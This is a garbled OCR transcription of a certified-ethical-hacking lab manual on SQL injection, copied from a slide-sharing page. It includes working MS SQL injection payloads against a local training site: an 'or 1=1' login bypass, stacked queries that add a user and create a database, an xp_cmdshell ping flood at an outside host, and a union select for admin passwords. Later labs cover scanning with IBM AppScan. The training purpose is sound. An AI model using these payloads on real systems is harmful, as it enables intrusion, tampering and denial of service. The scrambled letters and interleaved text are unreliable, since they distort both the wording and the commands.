C E H

Lab M a n u a l

S Q L In je c t io n
M o d u le 1 4
M odule 1 4 - S Q L In jectio n

S Q L

Injection

S O L i j c i n i a technique o t n used t attack a w b i e Iti themost...
M odule 1 4 - S Q L In jectio n

Lab Duration
Time: 50 Minutes

Overview of SQL Injection
SQL injection is a technique use...
M odule 1 4 - S Q L In jectio n

S Q L

Injection A t t a c k s o n

M S

S Q L

D a t a b a s e
S O L i j c i n i a ba ca...
M odule 1 4 - S Q L In jectio n

■ A computer running W in d o w
■

MS SQL S e rv e r

8

(Attacker Machine)

must be runn...
M odule 14 - S Q L In jectio n

6.

__ W hen the attacker
|/
enters blah’ or = , then
the S Q L query look like
this:

Ent...
M odule 1 4 - S Q L In jectio n

T ry to insert a string
value where a number is
expected in the input field.

F IG U R E ...
M odule 1 4 - S Q L In jectio n

6

F IG U R E 1. : Old House Login page

17. You will login successfully with the created...
M odule 1 4 - S Q L In jectio n

,Z

Most injections land in
the middle o f a S E L E C T
statement.
a SELEC T
clause, we ...
M odule 1 4 - S Q L In jectio n

Vi

Time delays are a
type o f blind S Q L Injection
that causes die SQ L engine
to execu...
M odule 1 4 - S Q L In jectio n

c a Use the bulk insert
statement to read any file
on the server, and use bcp
to create a...
M odule 14 - S Q L In jectio n

Tool/Utility

Information Collected/Objectives Achieved
■ Login id: 1003, 1004
■ Login Use...
M odule 1 4 - S Q L In jectio n

L a b

T e s t i n g for S Q L

Injection U s i n g

Security A p p S c a n
I CON

KEY

/...
M odule 1 4 - S Q L In jectio n

■ Generate reports for scanned web applications

Lab Environment
m

You can download
IB M...
Module 14 - SQL Injection

3. Click die IB M

S e c u rity A p p S can S tan d ard

app from S ta rt menu apps.

S ta rt
S...
M odule 1 4 - S Q L In jectio n

New Scan
Recent Templates

Predefined Templates
Regular Scan

C*> B row se...
Q

Q uick a...
M odule 1 4 - S Q L In jectio n

2

F IG U R E 2.6: IB M Rational AppScan —Scan Configuration W i ard

111 Login M a n a g...
M odule 1 4 - S Q L In jectio n

F IG U R E 2.9: IB M Rational AppScan Full Scan window

11. When die A uto S a v e window...
M odule 1 4 - S Q L In jectio n

FIG U RE 2.12: IBM Rational AppScau Scanning Web Application Result window

TASK

2

A n ...
M odule 14 - S Q L In jectio n

—

T A S K

3

G e n e ra te R epo rt

19. After Rational AppScan assesses your site's vul...
M odule 14 - S Q L In jectio n

Tool/Utility

Information Collected/Objectives Achieved

IBM Security
AppScan

PLE A SE

T...
M odule 1 4 - S Q L In jectio n

T e s t i n g for S Q L

Injection U s i n g

W e b C r u i s e r T o o l
I C ON

KEY

/ ...
M odule 1 4 - S Q L In jectio n

components and note entry points to start testing and exploring. Hence, as
another aspect...
M odule 1 4 - S Q L In jectio n

_

WebCruiser - Web Vulnerability Scanner Enterprise Edition
File

Tools

View

Configura...
M odule 1 4 - S Q L In jectio n

‫ו ל ן‬

Confirm

* Software Disclaimer:
* Authorization must be obtained from the web ap...
M odule 1 4 - S Q L In jectio n

W e b C ru ise r ‫ ־‬W e b V u ln e ra b ility Scanner E n te rp rise E d itio n
File
J

...
M odule 14 - S Q L In jectio n

PL EASE T A L K T O YO UR I N S T R U C T O R IF YOU H A V E Q U E S T I O N S
R E L A T E...
M odule 1 4 - S Q L In jectio n

T e s t i n g for S Q L

Injection U s i n g

N -

Stalker T o o l
I C ON

KEY

/ Valuabl...
M odule 14 - S Q L In jectio n

■ Analyze scanned results
■ Fix vulnerabilities 111 web applications
■ Generate reports fo...
M odule 1 4 - S Q L In jectio n

Start

A d m in is tra to r £

CcrrpUer

Modb
Firefox

Google
Chrome

Command

N-Stalker ...
M odule 14 - S Q L In jectio n

(MR OHM

m

toSecurity latclqotics same*

*!*‫״‬T.,
1

• 128MB R A M (available to
N-Stalk...
M odule 1 4 - S Q L In jectio n

N-Stalker S nW
ca izard
Start W Application Security Scan Session
eb

‫־‬m

You m ust ent...
M odule 1 4 - S Q L In jectio n

m

S e t t in g s

The term "G H D B "
was allegedly coined by
Johnny Long, which started...
M odule 1 4 - S Q L In jectio n

m

Google Hacking
Database (G H D B ) Tool is
a unique application that
w ill allow you t...
M odule 1 4 - S Q L In jectio n

m

"W eb M acro" is a
user-provided navigation
script that is usually
recorded using a we...
M odule 1 4 - S Q L In jectio n

Results Wizard

m

Scan Session has finished successfully.
llv.
N-Stalker found 12 vulner...
M odule 14 - S Q L In jectio n

PL EASE T A L K T O YO UR I N S T R U C T O R IF YOU H A V E Q U E S T I O N S
R E L A T E...
Upcoming SlideShare
Loading in...5
×

Ceh v8 labs module 14 sql injection

476

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
476
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
139
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Ceh v8 labs module 14 sql injection

  1. 1. C E H Lab M a n u a l S Q L In je c t io n M o d u le 1 4
  2. 2. M odule 1 4 - S Q L In jectio n S Q L Injection S O L i j c i n i a technique o t n used t attack a w b i e Iti themost cowwon neto s fe o est. s website v l e a i i y on t e I t r e . unrblt h nent I C ON Valuable information Test your ** Web exercise m Lab Scenario KEY Workbook re A SQL injection attack is done by including portions ot SQL statements 111 a web form entry field 111 an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits security vulnerability 111 a website's software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded 111 SQL statements or user input is not strongly typed and unexpectedly executed. SQL commands are thus injected from the web form into die database of an application (like queries) to change the database content or dump the database information like credit card or passwords to die attacker. SQL injection is mosdy known as an attack vector for websites but can be used to attack any type of SQL database. As an expert e th ic a l h ack er, you must use diverse solutions, and prepare statements with bind variables and wliitelisting input validation and escaping. Input validation can be used to detect unauthorized input before it is passed to the SQL query. Lab Objectives The objective of tins lab is to provide expert knowledge on SQL Injection attacks and other responsibilities that include: ■ Understanding when and how web application connects to a database server 111 order to access data & Too ls d e m o n s tra te d in th is lab a re a v a ila b le in D:CEH- ■ Extracting basic SQ L in je c tio n fla w s ■ Testing web applications for b lin d and v u ln e ra b ilitie s SQ L in je c tio n v u ln e ra b ilitie s ■ Scanning web servers and analyzing the reports ■ Securing information in web applications and web servers Too lsC E H v8 M o du le 14 SQL In je c tio n Lab Environment To earn* out die lab, vou need: ■ A computer running W in d o w s ■ W in d o w 7 S e rv e r 2 0 1 2 miming 111 virtual machine ■ A web browser with an Internet connection ■ Administrative privileges to configure settings and run tools C E H Lab Manual Page 782 Ethical Hacking and Countermeasures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  3. 3. M odule 1 4 - S Q L In jectio n Lab Duration Time: 50 Minutes Overview of SQL Injection SQL injection is a technique used to take advantage ot n on -valid ated input vulnerabilities to pass SQL commands through a w e b ap p lic a tio n for execution by a backend database. E task 1‫־‬ O v e rv ie w Lab Tasks Recommended labs to assist you in SQL Injection: ■ Performing b lin d SQ L in je c tio n ■ Logging on without v a lid ■ Testing for SQ L c re d e n tia ls in je c tio n ■ Creating your o w n user account ■ Creating your o w n d a ta b a s e listing ■ D ire c to ry ■ D e n ia l-o f-s e rv ic e attacks ■ Testing for SQL injection using the IB M S e c u rity A p p S c a n tool Lab Analysis Analyze and document the results related to the lab exercise. Give your opinion on your target’s secuntv posture and exposure. P LE A SE C E H Lab Manual Page 783 TA LK TO Y O U R IN S T R U C T O R IF Y O U R E L A T E D TO T H IS LAB. H A V E Q U E ST IO N S Ethical Hacking and Countenneasures Copyright © by EC-Comicil All Rights Reserved. Reproduction is Stricdy Prohibited.
  4. 4. M odule 1 4 - S Q L In jectio n S Q L Injection A t t a c k s o n M S S Q L D a t a b a s e S O L i j c i n i a ba cattack used e t e t gain unauthorised a c s t a database neto s si ihr o ces o or t r t i v information d r c l from the database. o eree iety I C ON / KEY Valuable mtomiation Test your ** Web exercise m Workbook re Lab Scenario Today, SQL injection is one ot die most common and perilous attacks that website’s software can experience. Tliis attack is performed on SQL databases that have weak codes and tins vulnerability can be used by an attacker to execute database queries to collect sensitive information, modify the database entries, or attach a malicious code resulting 111 total compromise of the most sensitive data. As an Expert p e n e tra tio n te s te r and se c u rity ad m in is tra to r, you need to test web applications running 011 the M S SQL S e rv e r database for vulnerabilities and flaws. Lab Objectives Tlie objective of tins lab is to provide students with expert knowledge 011 SQL injection attacks and to analyze web applications for vulnerabilities. 111 tins lab, you will learn how ■ Log 011 without v a lid ■ Test for SQ L to: c r e d e n tia ls in je c tio n ■ Create your o w n ■ Create your o w n H Too ls d e m o n s tra te d in th is lab a re a v a ila b le in D:CEHToo lsC E H v8 M o du le 14 SQL user account d a ta b a s e ■ D ire c to ry listing ■ Execute d e n ia l-o f-s e rv ic e attacks Lab Environment To earn‫ ־‬out die lab, you need: In je c tio n ■ A computer running W in d o w C E H Lab Manual Page 784 S e rv e r 2 0 1 2 (Victim Maclinie) Ethical Hacking and Countemieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  5. 5. M odule 1 4 - S Q L In jectio n ■ A computer running W in d o w ■ MS SQL S e rv e r 8 (Attacker Machine) must be running under local system privileges ■ A web browser with an Internet connection Lab Duration Time: 30 Minutes Overview of SQL Injection Attacks SQL injection is a basic attack used eidier to gain u n au th o rized a c c e s s to a database or to re trie v e information directly from die database. It is a fla w m w e b a p p lic a tio n s and not a database or web server issue. Most programmers are still not aware of diis direat. Lab Tasks is used when a web application is v u ln e ra b le to SQL injection but the results of the injection are n o t v is ib le to die attacker. B lind SQ L in je c tio n Log on w ith o u t V a lid C red en tia ls Blind SQL injection is identical to normal SQL injection, except diat, when an attacker attempts to exploit an application, rather dian seeing a useful error message, a g e n e ric c u s to m p a g e displays. TASK1 1. Run diis lab 111 F ire fo x . It will not work 111 Internet Explorer. Try to log on using code ' or — as login 1=1 2. Open a web browser, type h ttp ://lo c a lh o s t/re a lh o m e and press E n ter. 3. The H o m e page 111 die address bar, of Real Home appears. ‫וי ־ ליי ־‬ m A dpiamically generated SQ L query is used to retrieve the number o f matching rows. F IG U R E 1.1: Old House Restaurant home page Assume diat you are new to diis site and have never re g is te re d with diis website previously. ‫•צ‬ Now log in widi code: blah' or 1=1 -- C E H Lab Manual Page 785 Ethical Hacking and Countemieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  6. 6. M odule 14 - S Q L In jectio n 6. __ W hen the attacker |/ enters blah’ or = , then the S Q L query look like this: Enter any password 111 the P a s s w o rd held or leave die password held empty. 7. Click Log in or press E n te r. 1 1 S E L E C T Count(*) FR O M Users W H E R E UserName=’blah' O r 1=1 A N D Password=". F IG U R E 1.2: Old House Restaurant login page You are logged 111 to die website widi a take login. Your credentials are not valid, but you are logged in. Now you can browse all the web pages ot die website as a registered member. You will get a Logout link at die uppercorner of die screen. ‫ט‬ A user enters a user name and password that matches a record in the Users table. Reai Home! F IG U R E 1.3: Old House Restaurant web page You have successfully logged on to die vulnerable site and created your own database. TASK2 TASK 2 C rea tin g Y o u r O w n U s er Account C E H Lab Manual Page 786 C r e a te a u s e r a c c o u n t using an SQL injection query. 9. Open a web browser, type h ttp ://lo c a lh o s t/re a lh o m e and press E n ter. 10. The home page ot Real Home appears. Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  7. 7. M odule 1 4 - S Q L In jectio n T ry to insert a string value where a number is expected in the input field. F IG U R E 1.4: Old House home page 11. Enter die query b la h 1; i n s e r t in to lo g in values ( ‫ י‬j u g g y b o y j u g g y l 2 3 ' ) ; — in die Login name field and enter any password 111 die P a s s w o rd held or leave die P a s s w o rd field empty. 111 tins query, ju g g y b o y is the username, and ju g g y 1 2 3 is the password. U=!l To detect SQ L Injection, check if the web application connects to a database server in order to access some data. 12. After executing the query you will be redirected to die login page; tins is normal. 13. Try ju g g y b o y as the username, and ju g g y 1 2 3 as the password to log in. 14. Click L o g in or press E n te r. It y j Erro r messages are essential for extracting information from the database. Depending on die type o f errors found, you can vary the attack techniques. F IG U R E 1.5: Old House Login page 15. If no error message is displayed on die web page, it means diat you liave successfully created your logui using SQL injection query. 16. To v e rify whether your login has been created successfully, go to the login page, enter ju g g y b o y 111 the Log in N a m e field and ju g g y 1 2 3 111 the P a s s w o rd field, and click Login. Understanding the underlying SQ L query allows the attacker to craft correct S Q L Injection__________________________________________________________________________________________________________________________ M anual Page 787 E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Stricdy Prohibited.
  8. 8. M odule 1 4 - S Q L In jectio n 6 F IG U R E 1. : Old House Login page 17. You will login successfully with the created login. Now you can access all the features of the website. Go to S ta r t menu apps and launch and login with the credentials. SQ L S e rv e r M a n a g e m e n t S tu d io m Different databases require different SQ L syntax. Identify die database engine used by the server. F IG U R E 1.7: Old House Login page M TAS * TASK3 3 C re a te Y o u r O w n D a ta b a s e 3 Open a web browser, type h ttp ://lo c a lh o s t/re a lh o m e and press E n ter. 19. The C E H Lab Manual Page 788 Hom e Page 111 the address bar, of Real Home appears. Ethical Hacking and Countemieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  9. 9. M odule 1 4 - S Q L In jectio n ,Z Most injections land in the middle o f a S E L E C T statement. a SELEC T clause, we almost always end up in die W H E R E section. 111 F IG U R E 1.8: Old House Home page 20. 111 the Log in N a m e field, type b la h 1;c r e a te database juggyboy; — and leave the 2 1 . 111 P a s s w o rd field empty. Click Login. this query, ju g g y b o y is the name of the database. m Mosdv die error messages show you what D B engine you are working oil with O D BC errors. It displays database type as part o f the driver information. F IG U R E 1.9: Old House Login page 22. No error message or any message displays on die web page. It means diat die site is vulnerable to SQL injection and a database with die name juggyboy has been created at die database server. Try to replicate an error-free navigation, which could be as simple as ' and '1' = '1 O r ' and '1' = '2. C E H Lab Manual Page 789 23. When you open M ic ro s o ft SQ L S e rv e r M a n a g e m e n t D a ta b a s e you can see the created database, ju g g y b o y . S tu d io , under Ethical Hacking and Countenneasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  10. 10. M odule 1 4 - S Q L In jectio n Vi Time delays are a type o f blind S Q L Injection that causes die SQ L engine to execute a long-running query or a time delay statement, depending on the logic injected. F IG U R E 1.10: Microsoft SQ L Server Management Studio T A S K 5 D e n ial-o f-S ervice A tta c k 24. Open a web browser, type h ttp ://lo c a lh o s t/re a lh o m e and press E n ter. 25. The H om e Page 111 the address bar, of Real Home is displayed. Once you determine the usernames, you can start gathering passwords: Username: ' union select passw ord,l,l,l from users where username = 'admin'■ F IG U R E 1.11: Old House Home page 26. 111 die Login n a m e held, type b la h '; e x e c m a s te r. . xp_cm dshell , p in g w w w .c e rtifie d h a c k e r.c o m -1 65000 - t ' ; and leave the 27. m The attacker dien selects the string from the table, as before: P a s s w o rd field empty, and click Login. 111 the above query, you are performing a ping for the www.cert1t1edhacker.com website using an SQL injection query: -I is the send buffer size, and -t means to ping the specified host until stopped. Username: ' union select re t,l,l,l from foo— M icrosoft O L E D B Provider for O D BC Drivers error '80040e07'. C E H Lab Manual Page 790 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
  11. 11. M odule 1 4 - S Q L In jectio n c a Use the bulk insert statement to read any file on the server, and use bcp to create arbitrary text files on the server. F IG U R E 1.12: Old House Login page 28. The SQL injection query starts pinging die host, and die login page shows a W a itin g fo r lo c a lh o s t... message at the bottom left side of die window. 29. To see whether die query has successfully executed or not and ping is running, open your T a s k M a n a g e r window. 30. hi T a s k under the D e ta ils tab, you see a process called running 111 the background. M a n a g e r, P IN G .E X E 31. Tins process is die result of die SQL injection query diat you entered 111 die login held of the website. m Using the sp_OACreate, sp_OAMethod and sp_OAGetProperty system stored procedures to create O ld Automation (ActiveX) applications that can do everything an A SP script can do. Task Manager fie Option* 1- ‫! ם‬ * V1 ev» P'ccesses 1 Performance 1 Users Detail! Services 1 Nam* PID j p n t.[a > ?fcteaedSearch «e 350 1956 ‫ י‬ReporingServicesSer. 1800 Statue Running Running Running Liter name SYSTEM Administra CPU KAerrcrv (p._ Detfnptian 972 K TCP/IP Ping Command 00 00 3,536 K PretectedSearch ReportSeive 00 580 252 3340 402S Running Running SYSTEM SYSTEM 00 00 Running Running Administra. Administra 05 00 3844 Running Administra. 00 [‫ י‬snmoe<e <H 3plAO.% T 64.EJC 2016 3460 Running Running SYSTEM Administra. 00 00 0 9 spcclsv.exe 1200 1612 Running Running SYSTEM SYSTEM 00 00 $er/ices.exe L i 5n«cit32.exc f / f Sna51tEdtor.ee 1 '‫ י‬SnccFnv cxc * :!LLsqliwvT.ece [■2 jql»wkef.exe 31svcagnt.exe ‫־׳‬ 52,644K Reporting Ser/ices Service 3,628 K Services and Controller app 296 K Alndows Session Manager 32,264 K Snagit 19,724 K Snagit Editor 1,168 K insert RPC Helper 2.764 K SNMP Service 1,112 K Print driver host for applications 2.568K Spooler SubSystem App 34,292 K SQL Server W1 ndo-A‫ ״‬NT - 64 Bit s 2644 Running SYSTEM 00 1336 1172 e95 Running Running 5Y5TEM SYSTEM 00 00 5,436 K Amdows Desfctcp Agent 2,696K Aindov/: Desktop Agent 5 svchost«xc 736 Running Running SYSTEM NETWORK.. 00 00 1.972 K Host Process for Windows Services 3,164 K Host Process for Windows Services (L3schosLexe Q tv d v x tm 808 872 Running Running LOCAL SE... SYSTEM 00 00 ‫ ) י‬viJ ka Lcac ■'‫'׳‬svchost.exe [? i r .c h o jto c 7‫ י י‬svchost exe 908 Running Running LOCAL SE... 00 NE1W0RK. LOCAL CL.. 00 00 6,188 K Ho»t Protest for Windoiv* Services 6,596 K Host Process for Windows Services ■*,324K 1lo*t Proecsi for Wirdo«v* Scrviccj Running SYSTEM 00 = 1,164 K SQL Server VSSWriter 64 ‫ ־‬Bit 3 svcognt.cxe 1 1 svchostexe • 1 — 2.784 K Host Process for Windows Services @ 996 700 1238 7.372K 13.432K Host Process for Windows Services Mod Protect for Wmdowt Service? Ftvve! dctiis | End task | F IG U R E 1.13: Task Manager 32. To manually kill dns process, nght-click die PING.EXE process and select End P ro c e s s . This stops pinging of the host. Lab Analysis Analyze and document the results related to die lab exercise. Give your opinion on your target’s security posture and exposure. C E H Lab Manual Page 791 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  12. 12. M odule 14 - S Q L In jectio n Tool/Utility Information Collected/Objectives Achieved ■ Login id: 1003, 1004 ■ Login Username: juggyboy ■ Password: juggvl23 SQL Injection Attacks on MS SQL Database PLE A SE TA LK TO YO U R IN ST R U C T O R RELA T ED . IF YOU H A V E Q U E ST IO N S Internet Connection Required □ Yes 0 No Platform Supported 0 Classroom C E H Lab Manual Page 792 0 iLabs Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  13. 13. M odule 1 4 - S Q L In jectio n L a b T e s t i n g for S Q L Injection U s i n g Security A p p S c a n I CON KEY / Valuable information y Test your knowledge s Web exercise m Workbook review I B M T ool I B M Seen1f AppScan i a web appl tio s c r t t s i gt olthatautomates 7y s ica n e u i y e t n o v l e a i i y a s s me s prevents S O L i j c i n attacks on w b i e , and scans u n r b l t s e s nt , neto ests web es embedded malware. sit for Lab Scenario By now, you are familiar with the types of SQL injection attacks an attacker can perform and the impact caused due to these attacks. Attackers can use the following types of SQL injection attacks: authentication bypass, information disclosure, compromised data integrity, compromised availability of data, and remote code execution, which allows them to spoof identity, damage existing data, execute system-level commands to cause denial of service of the application, etc. In the previous lab you learned to test SQL injection attacks on MS SQL database for website vulnerabilities. As an expert s e c u rity p ro fe s s io n a l and p e n e tra tio n t e s t e r of an organization, your job responsibility is to test the company’s web applications and web seivices for vulnerabilities. You need to find various ways to extend security tests and analyze web applications, and employ multiple testing techniques. Moving further, in this lab you will learn to test for SQL injection attacks using IBM Security AppScan tool. H Too ls Lab Objectives d e m o n s tra te d in th is lab a re a v a ila b le D:CEHToo lsC E H v8 M o du le 14 SQL In je c tio n The objective of tins lab is to help students learn how to test web applications for SQL injection threats and vulnerabilities. 111 tins lab, you will learn to: ■ Perform website scans tor vulnerabilities ■ Analyze scanned results ■ Fix vulnerabilities in web applications C E H Lab Manual Page 793 Ethical Hacking and Countemieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  14. 14. M odule 1 4 - S Q L In jectio n ■ Generate reports for scanned web applications Lab Environment m You can download IB M AppScan from http://www .ibm.com. To earn‫ ־‬out die lab, you need: ■ -01 S e c u rity A p p S can located at D:CEH -ToolsC EHv8 M o du le 1 4 SQL ln jec tio n S Q L In je c tio n D e te c tio n ToolsMBM S e c u rity A p p S can ■ A computer running Window Server 2012 ‫ י‬Double-click on S E C _ A P P S _ S T D _ V 8 .7 _ E V A L _ W IN .e x e to install ■ You can also download the latest version of S e c u rity A p p S c a n from the link http: / / www01 ■b 111.com/software/awdtools / appscan/standard 1 C Q Supported operating systems (both 32-bit and 64— editions): bit ■ Windows 2003: Standard and Enterprise, SP1 and SP2 ■ A web browser with Internet access ■ Microsoft .NET Framework Version 4.0 or later ■ Windows Server 2008: Standard and Enterprise, SP1 and SP2 Lab Duration Time: 20 Minutes Overview of Testing Web Applications Web applications are tested for implementing security and automating vulnerability assessments. Doing so prevents SQL injection attacks 011 web servers and web applications. Websites are tested for embedded malware and to employ a multiple of testing techniques. TASK 1 T e s tin g W eb A p p lica tio n Lab Tasks 1. Follow the wizard-driven installation steps and install die IBM Security AppScan tool. 2. To launch IB M S e c u rity A p p S can move your mouse cursor to die lowerleft corner ot your desktop and click S tart. m A personal firewall running on die same computer as Rational AppScan can block communication and result in inaccurate findings and reduced performance. For best results, do not run a personal firewall on the computer that runs Rational AppScan. F IG U R E 2.1: Window's Server 2012 Desktop view C E H Lab Manual Page 794 Ethical Hacking and Countemieasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  15. 15. Module 14 - SQL Injection 3. Click die IB M S e c u rity A p p S can S tan d ard app from S ta rt menu apps. S ta rt S e‫׳‬vw sunagef us You can configure Scan Expert to perform its analysis and apply some of its recommendations automatically, when you start the scan. F= wnOowi Powiyietl hypei-v Manage‫־‬ Amhmic-. !ester Comeaitest 0 * FnrodeD. Fip^sxm ‫ז»ז‬ ‫©׳‬ y a SOI Server Manage S <udio V * < fi Wiwoie updates Control Panel * Morlla Cifefo* * ‫־‬ rm rxler e Google Chrccne 1 IBM becurny AppScon... . *> # HTTP Raqiiacl Cdtor P % Tokwi Analyrm A n F IG U R E 2.2: Windows Server 2012 Desktop view 4. The mam window of IB M S e c u rity S c a n ... to start die scanning. A p p S can — appears; click C re a te New / AppS can can scan both web applications and web services. F IG U R E 2.3: IB M Rational AppScan main window 5. Li die N e w N o te: 111 S can wizard, click die d e m o .te s tfire .n e t hyperlink. die evaluation version we cannot scan odier websites. Malware test uses data gathered during the explore stage o f a regular scan, so you must have some explore results for it to function. C E H Lab Manual Page 795 Ethical Hacking and Countenneasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
  16. 16. M odule 1 4 - S Q L In jectio n New Scan Recent Templates Predefined Templates Regular Scan C*> B row se... Q Q uick and L ig h t Scan 2 C o m p re h e n sive Scan ^ P aram eter-B ased N a v ig a tio n W ebS phere C om m erce £ 3 W ebS phere P ortal I x l d e m o .te s tfire .n e T | Hacm e Bank M Launch Scan Configuration Wizard Help Cancel F IG U R E 2.4: IB M Rational AppScan—New window m One o f die options in the scan configuration wizard is for Scan Expert to run a short scan to evaluate the efficiency o f the new configuration for your particular site. 6. 111 die S can C o n fig uratio n W izard, select W eb A p p lica tio n S can, and click N ext. * Scan Configuration Wizard W e lco m e lo th e C o n fig u r d tio n W iz a rd Th# Configurator M 12ard will hdp you cort«gur♦ a n•* *car b!s«d or th* scan tampbtt: dorr*.tootfir*.net Select the type of scan you wish to yxlcxrr | (3) Web Application Scon | O Web £*rwc• Scar Tho GSC VJob Sorvicos rocordot is net irctal «e DowrlQBd GSC 1 vw General Tasks 1 55~ ] ‫ד־‬ F IG U R E 2.5: IB M Rational AppScan —Scan Configuration Wizard 7. 111 URL and S erve rs options, leave the settings as tlieir defaults and click N ext. Scan Configuration Wizard Si) SMrnno ‫יאיי‬ Sartthoosan fromthe URL: //‫׳‬demo teettire ret. I ^~/ There are some For exarple• http‫־‬ //de1D resrfire net/ 0 □ Scan only lirks in and below ttos direcw/ changes diat Scan Expert can only apply widi human intervention, so when you select the automatic option, some changes may not be applied. W! Case-Sensitive Path Treet all paths as case-sensitive (Unix. liru x efc) &) Additional Servers and Domains Indude the foloAirc adcitcra servers and ctorars in ±is * d I need to configjt« aoditoral conMcbvity cednge (proxy. HTTP Authentication X W I 5c*1 cort'»3urator * rd ^‫ ־‬p C E H Lab Manual Page 796 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
  17. 17. M odule 1 4 - S Q L In jectio n 2 F IG U R E 2.6: IB M Rational AppScan —Scan Configuration W i ard 111 Login M a n a g e m e n t, select option A u to m a tic and enter the user name details as Username: js m ith and Password: D e m o 1 2 3 4 and click N ext. - Scan C onfigu ra tion W izard U L2nd Servers R W,' login Method Login Management Use :hefollowing method to log 1* O Recorded (Recommended) O Prompt | (j*) Automatic | JserName: |?nrh O None Password • • • • • Ccrfrm Pawvfcfd. • • • • • m T lie total number o f tests to be sent, or U R Ls to be visited, may increase during a scan, as new links are discovered. !!)•session detecjon !& et-0UeC. but Icon cieOeniab l<r.e ret yet teen vet Tied General Tasks I I I want to configure 1 -Seeeicn eetectcri optens 0 X ‫*יי‬S*Cnwcr ‫ י‬c1o^ ao I < Back |Next • ‫י‬ ‫ך‬ F IG U R E 2.7: IB M Rational AppScan Scan Configuration window 9. 111 T e s t P o licy options, click N e x t to continue. r *‫־‬ Scan C onfigu ra tion W izard U Land Servers R Login M anagement Test Policy ki) rest Polk‫־‬y Default Ueth T o P lic f r40 c n s is ot o y o 1s a rol<yMcs Thit polcy include* alltect* except !rvaer✓• a ‫־‬d prrt lsl#n»r te«rs / Security Issues view shows the actual issues discovered, from overview level down to individual requests/responses. Tins is the default view. Recent Policies g ) De*'ault £ 3'CWS#.. = Predefined Pokdn £ } Default r f l Applicafccn-Oniy Q Infrastructure-Only £ ] Hik'd Party-Only v E General Tasks V] Seed tees on login and ogoj: paces ✓( Clear session identifiers befo‫־‬c losing !cgir osgcs F IG U R E 2.8: IB M Rational AppScan Full Scan window 10. Click Finish to complete die Scan C o n fig uratio n W izard. ‫־‬P I Scan Configuration Wizard m Results can display in three views: Security Issues, Remediation Tasks, and Application Data. T lie view is selected by clicking a button in the view selector. The data displayed in all three panes varies with tlie view' selected. U Land Servers R Login M anagement Tost Policy Com plete W Complete Scan Cuuftouratiu■ VTItard You hose successful 1/ completed t*‫ »־‬Scar Conifurabo• .*fcard Hw o o w rttosari? o dyu a [ (§‫ ־‬Stan a full autoT tic scan ■ a j C Slorl with auiometc Explore only C Sian wth Manual Explore O I will start the scan later 3 Stdrt Scan Expert *hen Scan Corfourctcn Y/zar d is axrotetc Ger»eral T«»k> X W « Cnartr !5‫ י‬of uac t * fd j» p C E H Lab Manual Page 797 I <Back || hn1Bh~ Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
  18. 18. M odule 1 4 - S Q L In jectio n F IG U R E 2.9: IB M Rational AppScan Full Scan window 11. When die A uto S a v e window prompts you to save a u to m a tic a lly scan, click Y e s to save die file and proceed to scan. X Auto Save •J during The scan needs to be saved now because AppScan is set to Automatically save during scan'. Would you like to save the scan now? Click Yes' to save the scan now. Click No' to disable Automatically save during scan' fof this scan only. Click Disable' to disable Automatically save during scan' for this and future scans. Remediation Tasks view provides a To D o list o f specific remediation tasks to fix the issues found by die scan. Yes || No || Disable j F IG U R E 210: Auto Save window 12. Security AppScan starts scanning die provided URL for vulnerabilities. . l __ The Result List displays the issues for whatever item is selected in the application tree. These can be for: ‫י‬ Root level: A ll site issues display ■ Page level: A ll issues for die page ■ Parameter level: A ll issues for a particular request to a particular page * j* ,« > — » 9 t‘. • it___ F IG U R E 2.11: IB M Rational AppScan Scanning Web Application window N o te: It will take a lot of time to scan die complete site; stopped before scanning is complete. 111 diis lab we have 13. After die scan is complete, die application lists all die security issues and vulnerabilities 111 die website. 14. Results can be displayed 111 diree views: Data, Issues, and Tasks. 15. To view die vulnerabilities and security issues in particular website click die Issues tab. You can export die complete scan results as an X M L file or as a relational database. (The database option exports die results into a Firebird database structure. This is open source and follows O D BC an d JD B C standards.). C E H Lab Manual Page 798 Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Stricdy Prohibited.
